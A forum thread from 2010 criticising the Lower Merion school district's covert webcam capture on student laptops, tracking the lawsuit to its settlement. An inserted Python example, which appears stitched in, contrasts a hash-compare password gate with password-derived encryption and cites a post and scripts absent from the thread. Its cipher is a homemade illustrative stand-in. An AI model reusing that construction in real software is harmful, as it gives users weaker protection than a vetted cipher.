If you don't want your laptops to be abused offsite, or you don't want data to leak out from missing laptops: don't give them out. For the money they spent on the laptops for each student, they could easily have installed desktops and given each student a roaming profile so that they have the same workspace when they log in to any computer at school, and if work from home is needed offer a web-based vpn solution such as Firepass that allows a student to log in to their desktop from home. If that student can't afford a computer, THEN you can consider a laptop loaner program as an exception.

My two cents. YMMV.

Either way, this school is learning hard lessons that were already learned in corporate america decades ago. At some point you have to trust the users you issue laptops to. That you are issuing them to kids doesn't change that, and doesn't excuse the lapse in security demonstrated by the incompetent tech or the draconian and intrusive spying done as security theater for the administration to abuse.
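
The hash-versus-key point in the post above, as an added example that is not part of the original post or of the school's scripts: a hash-compare gate beside a design where the password derives the key that encrypts the guarded value. All names and sample values are constructed, reading "password as the key" as key derivation is an assumption, and the HMAC-based keystream is a standard-library stand-in for a vetted AEAD such as AES-GCM.

```python
import hashlib
import hmac
import os

# Constructed sample values; nothing here comes from the school's scripts.
ADMIN_PASSWORD = b"constructed-admin-password"
GUARDED_SECRET = b"constructed value the script is meant to protect"

# --- Pattern 1: hash-compare gate (the approach the post criticises) ---
STORED_HASH = hashlib.sha256(ADMIN_PASSWORD).hexdigest()


def gate_by_hash(candidate, stored_hash=STORED_HASH):
    """Release the secret when sha256(candidate) equals the stored hash.

    The secret sits in cleartext beside the check, and the check trusts
    whatever hash the file holds, so whoever can edit the file owns the gate.
    """
    digest = hashlib.sha256(candidate).hexdigest()
    if hmac.compare_digest(digest, stored_hash):
        return GUARDED_SECRET
    return None


# --- Pattern 2: the password is the key ---
PBKDF2_ROUNDS = 200_000


def _derive_keys(password, salt):
    """Stretch the password into separate encryption and MAC keys."""
    material = hashlib.pbkdf2_hmac("sha256", password, salt,
                                   PBKDF2_ROUNDS, dklen=64)
    return material[:32], material[32:]


def _keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode (illustrative stand-in for a real cipher)."""
    blocks = []
    for counter in range((length + 31) // 32):
        msg = nonce + counter.to_bytes(8, "big")
        blocks.append(hmac.new(key, msg, hashlib.sha256).digest())
    return b"".join(blocks)[:length]


def seal(password, plaintext):
    """Encrypt-then-MAC under keys derived from the password."""
    salt, nonce = os.urandom(16), os.urandom(16)
    enc_key, mac_key = _derive_keys(password, salt)
    stream = _keystream(enc_key, nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    return salt + nonce + ciphertext + tag


def unseal(password, blob):
    """Return the plaintext, or None on a wrong password or altered blob."""
    if len(blob) < 64:
        return None
    salt, nonce = blob[:16], blob[16:32]
    ciphertext, tag = blob[32:-32], blob[-32:]
    enc_key, mac_key = _derive_keys(password, salt)
    expected = hmac.new(mac_key, salt + nonce + ciphertext,
                        hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    stream = _keystream(enc_key, nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, stream))


if __name__ == "__main__":
    # Pattern 1: replacing the stored hash is enough, no password needed.
    swapped = hashlib.sha256(b"anything").hexdigest()
    print("hash gate, swapped hash:", gate_by_hash(b"anything", swapped))

    # Pattern 2: the file holds only salt, nonce, ciphertext and tag.
    blob = seal(ADMIN_PASSWORD, GUARDED_SECRET)
    print("sealed, right password:", unseal(ADMIN_PASSWORD, blob))
    print("sealed, wrong password:", unseal(b"anything", blob))
```
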

tyr_13
28th February 2010, 09:34 AM
Great post Ducky.

quadraginta
28th February 2010, 09:58 AM
<snip>

Either way, this school is learning hard lessons that were already learned in corporate america decades ago. At some point you have to trust the users you issue laptops to. That you are issuing them to kids doesn't change that, and doesn't excuse the lapse in security demonstrated by the incompetent tech or the draconian and intrusive spying done as security theater for the administration to abuse.


Good stuff, Ducky.

I expect we will hear much from the school system supporters about the alleged primary rationale for the use of this particular feature of the software by the school, theft prevention. As the suppliers of the software pointed out, the proper exercise of such an application would be in conjunction with law enforcement. If they had taken that approach this debacle never would have happened.

Ducky
28th February 2010, 09:58 AM
Great post Ducky.

Thanks Tyr. I'd be interested in GreNME's thoughts on that post, as he deals with user-end issues much more than I do.

This really seems like a mix of overzealous attempts at behavioral control by school staff mixed with pretty astoundingly incompetent hobbyist style hacks to spy on kids to achieve that. If I went into work and suggested what the school was doing for corporate laptops I would be rightly laughed out of the meeting. It boils down to being able to spy on the laptop with no real data security, and that's a recipe for abuse not only from school staff but from students and/or would be laptop thieves. Effective security should not also circumvent liberty. The two are not mutually exclusive.

All of that aside, there's no call for the school to ever be able to see into the student's bedroom. I can't even imagine a scenario where that's a good idea.

Ducky
28th February 2010, 10:00 AM
Good stuff, Ducky.

I expect we will hear much from the school system supporters about the alleged primary rationale for the use of this particular feature of the software by the school, theft prevention. As the suppliers of the software pointed out, the proper exercise of such an application would be in conjunction with law enforcement. If they had taken that approach this debacle never would have happened.

The lack of data security (ie: whole disk encryption) shows that their rationale is coming from completely incompetent ideas about security. In corporate america, we expect that when a laptop is stolen the data is encrypted and claim it as loss. If the school can't fund that kind of approach, then they should not let it off the grounds. Recovery rates for stolen laptops are abysmal.

quadraginta
28th February 2010, 10:17 AM
The lack of data security (ie: whole disk encryption) shows that their rationale is coming from completely incompetent ideas about security. In corporate america, we expect that when a laptop is stolen the data is encrypted and claim it as loss. If the school can't fund that kind of approach, then they should not let it off the grounds. Recovery rates for stolen laptops are abysmal.


You know that. I know that. The IT people that the school had working for them probably knew that, and may very well have passed such wisdom on to clueless admin.

All true, but to date the primary (note my choice of words) alleged rationale put forth by the school in their defense has been, and has only been theft prevention. Discussions of the intricacies of password security and data encryption will not sell any papers, and would be lost on the audience even if presented, and the school has already been salting the mine with positive numbers about their recovery rates for stolen equipment. Valid or not they seem to be setting this up as their main line of defense in the theater of public opinion.

Ducky
28th February 2010, 10:43 AM
You know that. I know that. The IT people that the school had working for them probably knew that, and may very well have passed such wisdom on to clueless admin.

All true, but to date the primary (note my choice of words) alleged rationale put forth by the school in their defense has been, and has only been theft prevention. Discussions of the intricacies of password security and data encryption will not sell any papers, and would be lost on the audience even if presented, and the school has already been salting the mine with positive numbers about their recovery rates for stolen equipment. Valid or not they seem to be setting this up as their main line of defense in the theater of public opinion.

ETA: Agreed. It's going to be a piss poor excuse to those who actually know what they're talking about, though. The system just seems to be designed to enforce behavior and have the ability to spy on those not in step. That's pretty horrible. I can only hope the public is more outraged by the draconian 1984 attempt at control than swayed by the "OMG It's security! You have to give up privacy for that" crap we've been fed for 9 years.

Three things more effective than the laptop cam in security:

1) Disk encryption
2) internally installed GPS device for tracking
3) Network-enforced policies on software such as firewalls being on and screen-savers locking.


#2 is the only real way to know where your laptop is to recover it via help of the police. Snapping a picture isn't going to guarantee recovery.

quadraginta
28th February 2010, 10:53 AM
ETA: Agreed. It's going to be a piss poor excuse to those who actually know what they're talking about, though. The system just seems to be designed to enforce behavior and have the ability to spy on those not in step. That's pretty horrible. I can only hope the public is more outraged by the draconian 1984 attempt at control than swayed by the "OMG It's security! You have to give up privacy for that" crap we've been fed for 9 years.

<snip>


Exactly!

GreNME
28th February 2010, 06:18 PM
I think a "good post, Ducky" would actually suffice, but since Ducky is interested in my thoughts from my perspective...

Coming back to this, it really seems that school districts are trying to apply their behavioral strategies for student conduct to administration and support of hardware they are loaning out to the students. This is going to fail in several ways.

Actually, it's going to fail in one simple way (through several avenues): human nature. You pretty accurately point out why.

Firstly there's the problem of physical control.

Firstly and lastly. It's a fairly universal truth that physical access to IT assets is the second-greatest security flaw (the first being users of IT assets).

At some point they need to realize they are loaning a two thousand dollar laptop to a student and make clear the expectations of that student's use. This happens in the corporate world all the time, and if you think adults are any better about not googling for boobs on corporate laptops I'd say that thought is naive. One student responded with a way to hack the computers to gain access to school records. This shows that the school was not interested in actual information security or control, but interested in behavior control of the students and whatever spying gave them the illusion of control.

While I have all sorts of colorful estimations as to why this wasn't obvious to the schools, I think it better to compare this to the same flaws in several government bureaucratic security systems (similar to what Ducky does), because they follow the same flawed approach. Intrusive doesn't equal secure in any sense of the word.

What they should have focused on were laptop policies to secure data such as whole disk encryption, remote/roaming profiles or user data backup to school servers and encrypted connections to the school network. Use outside of an end user agreement that fully discloses what's on the laptop, why it is in place, and what policies are there to protect data of the student and the school can be dealt with when the kid can't fix what he broke and brings it in to IT for fixes.

Honestly, even taking out whole disk encryption and user data backup would have been a night/day difference in terms of security. Sure, the disk encryption would protect the file system and user data backup would provide redundancy, but remote or roaming profiles-- and, preferably, some form of directory services (group policies and Active Directory for Win-world, user scripts and LDAP for *nix-world)-- would have provided the simplest and most straight-forward security, and even more important is built into the operating systems (or the compatibility is built into what) they would use. I could understand a school system not wanting to invest in the disk real estate for user profile backups, and I can understand not wanting to invest in an effective (for the back-end and front-end) disk encryption as well, but both would definitely round out an effective security policy.

The trouble would be fixing problems when they arise (or when someone accidentally breaks them). For this, a competent IT staff would need to be in place, and on top of that an IT management person or group would have to make sure that standards were followed over the whole of the school staff's computers as well as any computers that the students were given (or had access to). I can't say whether pay was an issue or whether the school district in Philly just didn't have qualified candidates, but the chances that the schools had sufficient staff or budget to handle that is likely low.

Other than that, there's no call for being able to remotely monitor the student's laptop even at school. On the school network, they should have web proxies on the server end that filter content and firewall/network rules to prevent the use of proxy circumvention. When the laptop is off site they need to accept they can't control what is going to be done with it, have reasonable protections in place and deal with the minor cases of laptop misuse as they come up.

This is likely a management FUBAR, in my experience. Management tends to overestimate and under-budget, even in the corporate world.

If you don't want your laptops to be abused offsite, or you don't want data to leak out from missing laptops: don't give them out. For the money they spent on the laptops for each student, they could easily have installed desktops and given each student a roaming profile so that they have the same workspace when they log in to any computer at school, and if work from home is needed offer a web-based vpn solution such as Firepass that allows a student to log in to their desktop from home. If that student can't afford a computer, THEN you can consider a laptop loaner program as an exception.

Meh. An easier-to-manage situation would have been a terminal server access portal for students, or maybe even a web-based portal services system. Since student bodies are constantly advancing in grade levels and the users shifting by likely thousands in larger school systems, it would have been smarter to have a more centralized access system for student documents-- easier to manage, secure, and if the school wanted to, monitor.

Either way, this school is learning hard lessons that were already learned in corporate america decades ago. At some point you have to trust the users you issue laptops to. That you are issuing them to kids doesn't change that, and doesn't excuse the lapse in security demonstrated by the incompetent tech or the draconian and intrusive spying done as security theater for the administration to abuse.

Indeed. That the school system seems to not have followed any of the lessons learned by the corporate world isn't only odd, it's downright asinine in execution. Honestly, the parents and taxpayers into that school system should not only be demanding that heads roll (from a legal perspective), but also that the superintendent and school board completely re-work the school system's IT infrastructure.

Upchurch
28th February 2010, 07:24 PM
WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.
So, in conclusion, my problem is with arrogant ignorance. I don't mind if someone is simply ignorant of something, they can be taught. I don't mind if someone is simply arrogant, so long as they are correct. But when someone is ignorant of a topic and insists that it could not be different from their uninformed opinion, that's just plain annoying.

Foolmewunz
28th February 2010, 07:36 PM
So, doesn't someone come along now and talk about all their years in chicken ranching law enforcement and smack ol' Ducky down.

Nice to see solid skepticism in action. Good work from the Titanium PuprHero.


(*Apologies to The Band, but The Night They Smacked Ol' Ducky Down has a nice ring to it - not that "Drove Ol' Dixie Down" isn't already suggestive enough to cause serious snickering.)

Ducky
28th February 2010, 10:45 PM
So, doesn't someone come along now and talk about all their years in chicken ranching law enforcement and smack ol' Ducky down.

Nice to see solid skepticism in action. Good work from the Titanium PuprHero.


(*Apologies to The Band, but The Night They Smacked Ol' Ducky Down has a nice ring to it - not that "Drove Ol' Dixie Down" isn't already suggestive enough to cause serious snickering.)

I would love to hear from a law enforcement perspective on the school's actions given what we've discovered about the technical abilities and failings of the school administration and tech support. (ETA: Of course that would also involve making sure the law enforcement perspective understands what I've explained.) My perspective is simply that of a professional UNIX Admin.

And you totally copied REO Speedwagon.

quadraginta
28th February 2010, 11:33 PM
The discussions of data security in a large network environment have been very enlightening and interesting, but I should like to note that it does not seem to be very important to the school system as far as this particular fiasco is concerned. I haven't seen anything in their statements which indicate a concern with the vulnerability of either their corporate data (school records) or the personal data of the students.

I'm not saying that they have no such concern, but they haven't been presenting data security as a justification for any of their behavior, only the physical recovery of hardware (laptops) removed without authorization.

I almost have to wonder if someone in admin, but not IT, noticed the remote viewing "security" feature of the network supervision package the school had selected and said to themselves "Hey, this is cool!" without contemplating the repercussions and without considering the actual lack of real benefits. It is interesting to note that the current publisher of that software package is intending to disable that feature. If such an intention was not prompted by this episode it might suggest that they had encountered similar issues in a less public venue.

Ducky
1st March 2010, 02:48 AM
The discussions of data security in a large network environment have been very enlightening and interesting, but I should like to note that it does not seem to be very important to the school system as far as this particular fiasco is concerned. I haven't seen anything in their statements which indicate a concern with the vulnerability of either their corporate data (school records) or the personal data of the students.

I'm not saying that they have no such concern, but they haven't been presenting data security as a justification for any of their behavior, only the physical recovery of hardware (laptops) removed without authorization.

I almost have to wonder if someone in admin, but not IT, noticed the remote viewing "security" feature of the network supervision package the school had selected and said to themselves "Hey, this is cool!" without contemplating the repercussions and without considering the actual lack of real benefits. It is interesting to note that the current publisher of that software package is intending to disable that feature. If such an intention was not prompted by this episode it might suggest that they had encountered similar issues in a less public venue.


While it's true physical recovery and data security are separate issues, they are to any IT professional very much intertwined. That they would consider one without the other to me seems to be gross incompetence at best. At worst it's a complete disregard for data security of their students and their own network in favor of focusing on the ability to spy on the hardware. What that functionally accomplishes is nothing but an excuse for abuse at the cost of actual security measures in terms of their laptops and their network. This is why the argument over recovering assets doesn't fly with me.

I would also be interested to know if the high percentage of recovered laptops were recoverable by standard investigative means (ie. the person who took it knew or was traceable back to the person it was taken from.) If that is indeed the case (and I should be careful to say I don't know, as they haven't disclosed that information) then their measures are nothing more than draconian spying justified with a very weak excuse.

In the real world recovering a stolen laptop is done by better means than snapping a picture. Most thieves will boot off a boot CD, dump the hard drive data off somewhere, load their own OS and sell the laptop. (That is, if the thief is even remotely intelligent, there are of course exceptions.) Even if they don't dump the data, it's not rocket science to think something will load that is traceable on an OS such as instant messenger clients, etc. This again is where encrypting the hard drive is important. No one is going to bother trying to crack encryption when there's 500-1000 bucks of quick cash to be made and another sucker with a laptop won't be as secure. By the numbers they'll get more personal data to farm for identity theft if they just sell the laptop and move on.

Recovery of a stolen laptop is far more effective if you're tracking something not dependent on the OS, like a GPS device that runs off the battery, but not limited to only running when the laptop is booted or even on. It also is better left to law enforcement than IT geeks and School administrators.

But of course, I'm no law enforcement expert.

Ducky
1st March 2010, 03:12 PM
WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.

I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

Still waiting on your response to the information I have posted.

GreNME
1st March 2010, 04:07 PM
The discussions of data security in a large network environment have been very enlightening and interesting, but I should like to note that it does not seem to be very important to the school system as far as this particular fiasco is concerned. I haven't seen anything in their statements which indicate a concern with the vulnerability of either their corporate data (school records) or the personal data of the students.

I'm not saying that they have no such concern, but they haven't been presenting data security as a justification for any of their behavior, only the physical recovery of hardware (laptops) removed without authorization.

I almost have to wonder if someone in admin, but not IT, noticed the remote viewing "security" feature of the network supervision package the school had selected and said to themselves "Hey, this is cool!" without contemplating the repercussions and without considering the actual lack of real benefits. It is interesting to note that the current publisher of that software package is intending to disable that feature. If such an intention was not prompted by this episode it might suggest that they had encountered similar issues in a less public venue.

The reason Ducky has been going over the issue of data security with networked environments is because data security and asset recovery would be the only two reasons for doing what the school did in this case, and for both ends what was actually done would be completely and wholly inefficient (and, as Ducky states, draconian). The reason data security was foremost in Ducky's post was because that would be the real need that any IT security has to address above all else, particularly when it deals with equipment leaving the premises. As far as asset recovery possibilities, there would be little to no software that would make sense allowing school staff to essentially spy on the camera, as the main concern of an asset recovery system would instead focus on location awareness and recording/reporting data access attempts to sensitive information.

Since the capability that the school was making use of wouldn't have actually addressed either of those concerns, the main criticism that the school system and administrators should be required to answer is what was the purpose of having the capability in the first place?

tyr_13
1st March 2010, 04:51 PM
Since the capability that the school was making use of wouldn't have actually addressed either of those concerns, the main criticism that the school system and administrators should be required to answer is what was the purpose of having the capability in the first place?

You obviously haven't heard of the Mike & Ike problem in today's schools. Kids are throwing back 'MI's', as they are called on the street, like they were some sort of candy.

Tasty, tasty candy.

quadraginta
1st March 2010, 05:41 PM
The reason Ducky has been going over the issue of data security with networked environments is because data security and asset recovery would be the only two reasons for doing what the school did in this case, and for both ends what was actually done would be completely and wholly inefficient (and, as Ducky states, draconian). The reason data security was foremost in Ducky's post was because that would be the real need that any IT security has to address above all else, particularly when it deals with equipment leaving the premises. As far as asset recovery possibilities, there would be little to no software that would make sense allowing school staff to essentially spy on the camera, as the main concern of an asset recovery system would instead focus on location awareness and recording/reporting data access attempts to sensitive information.

Since the capability that the school was making use of wouldn't have actually addressed either of those concerns, the main criticism that the school system and administrators should be required to answer is what was the purpose of having the capability in the first place?


Yes, I agree. That was sort of my point. Maybe I didn't express myself well enough.

Ducky
1st March 2010, 10:15 PM
Yes, I agree. That was sort of my point. Maybe I didn't express myself well enough.

GreNME has a way of verbalizing technical topics that is much more concise than what I usually come up with.

Ducky
2nd March 2010, 12:39 PM
I'll take it that UY has no intention of returning to this thread then.

For the record, I'm interested in his review of what I posted in regards to his own words below:

I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

The significance of this is that such a software request would not be cheap, and it would become widely known in the school district. It's just one more piece of evidence that says this story is most likely ********:
* There's no good reason to do it.
* It's clearly against the law.
* Any practical or official use of the information would expose the whole shebang.
* It's expensive.
* Too many people would be involved for it to stay secret.
* It's easily detected by anybody with a modicum of computer expertise.
* Everybody involved would lose their jobs and be subject to civil lawsuits if not criminal prosecution.

On the other hand, we have the word of one student who claims that the school took a picture of him doing something inappropriate in his home. Right. They were just sitting there watching him stand right in front of his laptop. They saw him misbehave, so they saved a snapshot at Computer Central. Then they called the kid into the office and said, "We saw what you did on your own private time at home. Here's our evidence [shows pic]. You didn't actually break any school rules, and I am opening myself up to a civil lawsuit of epic proportions, but so what? I just wanted to let you know."

Anybody want to wager on how this story turns out?

Bolding mine.

Morrigan
2nd March 2010, 02:17 PM
Dude, it's clear Brave Sir Robin has gallantly chickened out and won't be returning, so, we can move on now. :D

Ducky
2nd March 2010, 02:21 PM
Dude, it's clear Brave Sir Robin has gallantly chickened out and won't be returning, so, we can move on now. :D

Fair enough. Being the head on the far right side, I missed it. GreNME is on the left, so he may have seen it.

Ok so who's got legal expertise and can talk to that? I'm interested to hear about issues regarding school's rights to be parent in absentia extending to the home or whether this does infringe on wiretapping statutes.

casebro
2nd March 2010, 04:10 PM
So, no word yet from the FBI? or the other law enforcement agencies?

The school hasn't apologized to the kid, her family, and the other students? Nobody put on paid leave? Unpaid leave?

quadraginta
2nd March 2010, 04:21 PM
So, no word yet from the FBI? or the other law enforcement agencies?

The school hasn't apologized to the kid, her family, and the other students? Nobody put on paid leave? Unpaid leave?


The FBI made a formal statement saying they were investigating, as did the local DA. I think I linked to those upthread.

It's probably a little early for those entities to make any official pronouncements beyond that.

tyr_13
2nd March 2010, 06:27 PM
Mr. Born of Just Born Inc has publicly apologized for the dangerous and addictive nature of their product. He vowed to add a warning label to not consume his product on school property, while driving, or while within view of a web cam.*

*This is all a joke, don't go looking for Mr. Born's press release.

GreNME
2nd March 2010, 06:38 PM
Fair enough. Being the head on the far right side, I missed it. GreNME is on the left, so he may have seen it.

Ok so who's got legal expertise and can talk to that? I'm interested to hear about issues regarding school's rights to be parent in absentia extending to the home or whether this does infringe on wiretapping statutes.

Well, I don't know for sure about Pennsylvania, but if the school were in New Jersey I could ensure that they'd breached a couple of statutes. On the federal level, I'm also fairly certain that there's at least a case that could be made against the school for breaches of privacy laws.

Chances are likely that the FBI is going to give the local authorities a crack at them first, and compare notes along the way in case they want to bring a case of their own. If memory serves, the FBI will probably offer to assist the state or local authorities in order for them to prosecute this on their own, and keep it from jumping into any federal courts. As such, state and local laws are going to play pretty strongly into this.

Ducky
3rd March 2010, 11:38 AM
Ok searching through EFF's site, they apparently have only released statements via the joint ACLU statement I linked to earlier. This is a shame, because I would like to see an in-depth review by the EFF of the merits of each point in the case.

Ladewig
24th March 2010, 08:02 PM
The suit has its own wikipedia page: http://en.wikipedia.org/wiki/Blake_J._Robbins_v._Lower_Merion_School_District

The school district has suggested that Blake was in possession of a loaner laptop, because he had not paid a $55 insurance fee which would have permitted him to use one of the regular computers. In a 2009 letter to parents from Harriton principal Steven R. Kline stated, "no uninsured laptops are permitted off campus," and explained that students who had not paid the insurance fee could use one of the loaners. Asked if Robbins took a loaner computer home without authorization, Young declined to comment.[27] The Philadelphia Inquirer speculated that, if the loaner was considered missing, the circumstances might have prompted the district to activate the Web cam.[28] Haltzman denied that Blake was ever notified that his computer use was a problem, and stated that Blake had taken a computer home "every single day" for a month.[29]

applecorped
16th April 2010, 04:17 PM
http://www.philly.com/philly/news/breaking/20100416_The_Lower_Merion_School_District_today_acknowledged_that_NO_HEAD_SPECIFIED.html

"
The Lower Merion School District today acknowledged that investigators reviewing its controversial laptop tracking program have recovered "a substantial number of webcam photos" and that they expect to soon start notifying parents whose children were photographed.
Responding to a motion filed Thursday as part of a lawsuit brought by the family of a Harriton High School sophomore, School Board President David Ebby said the district's lawyers have proposed enlisting Chief U.S. Magistrate Judge Thomas Rueter to supervise a system by which parents are to be notified and allowed to view the photos.
"We hope to start that process shortly," Ebby said in a statement addressed to parents and guardians and posted on the district's website. "During that process the privacy of all students will be strongly protected."
Ebby's comments came a day after a lawyer for Harriton sophomore Blake Robbins filed a motion in federal court asserting that the system had secretly captured "thousands of images of webcam pictures and screen shots," including photos of students, the Web sites they visited and excerpts of their online chats.
School officials have thus far declined to say how many students were photographed by the system, which was instituted in September 2008 to locate missing or stolen laptops. The district has commissioned an internal investigation and promises to release its results within a few weeks."

commandlinegamer
17th April 2010, 06:55 AM
They're gonna burn..

Ladewig
20th April 2010, 06:24 AM
link (http://www.thetechherald.com/article.php/201016/5526/School-district-says-56-000-photos-and-screenshots-taken-of-students)

According to several reports, including statements from LMSD, 56,000 images were taken by the district’s security software, capturing students in their homes.

56,000! That includes screenshots of text messaging, but still: WTF?

.. . . . . . . . . . . . .. . . . .
ETA: TechNewsWorld (http://www.technewsworld.com/story/69805.html?wlc=1271769946)
"The plaintiffs' Motion suggests that the LANRev tracking feature may have been used for the purposes of 'spying' on students," [school board president] Ebby added. "While we deeply regret the mistakes and misguided actions that have led us to this situation, at this late stage of the investigation we are not aware of any evidence that District employees used any LANRev webcam photographs or screenshots for such inappropriate purposes."

Well, I'm glad that the internal investigation showed that none of the 56,000 photos and screenshots were used for inappropriate spying on students. Although personally, I would define falsely accusing a student of using drugs to be an inappropriate purpose.



. . . . . . . . . . . . . . . . .

More ETA:
Clarification:

About 38,500 images - or almost two-thirds of the total number retrieved so far - came from six laptops that were reported missing from the Harriton gymnasium in September 2008. The tracking system continued to store images from those computers for nearly six months, until police recovered them and charged a suspect with theft in March 2009.

source (http://www.philly.com/inquirer/local/20100420_Lower_Merion_details_scope_of_Web-cam_surveillance.html)

WildCat
12th October 2010, 11:44 AM
A settlement has been reached (http://www.chicagotribune.com/news/chi-1011-laptop-ap-story,0,2746834.story):
A Philadelphia-area school district has agreed to pay $610,000 to settle two lawsuits over secret photos taken on school-issued laptops.

The Lower Merion School District admits it captured thousands of webcam photographs and screen shots from student laptops in a misguided effort to locate missing computers.

And contingency fees are now 70%? :eye-poppi
The settlement calls for $175,000 to be placed in a trust for Robbins and $10,000 for a second student who filed suit, Jalil Hassan. Their lawyer, Mark Haltzman, will get $425,000 for his work on the case.

shadron
12th October 2010, 07:24 PM
Heh - I wonder what that comes to hourly?

The Fallen Serpent
14th October 2010, 10:02 AM
I would not be surprised if most of the $470,000 was eaten up in research and expert witnesses rather than being entirely take home for the firm. It is not unheard of for law firms to front the money in these cases if there is an expectation of pay out and technology cases can be very expensive. I do not really expect a newspaper article to differentiate between the lawyer's specific fees and all legal costs associated with the winning suit.

brenn
14th October 2010, 10:42 AM
They're lucky nobody was criminally charged. The U.S. Attorney may have declined to file, but that's a long way from saying no crime was committed.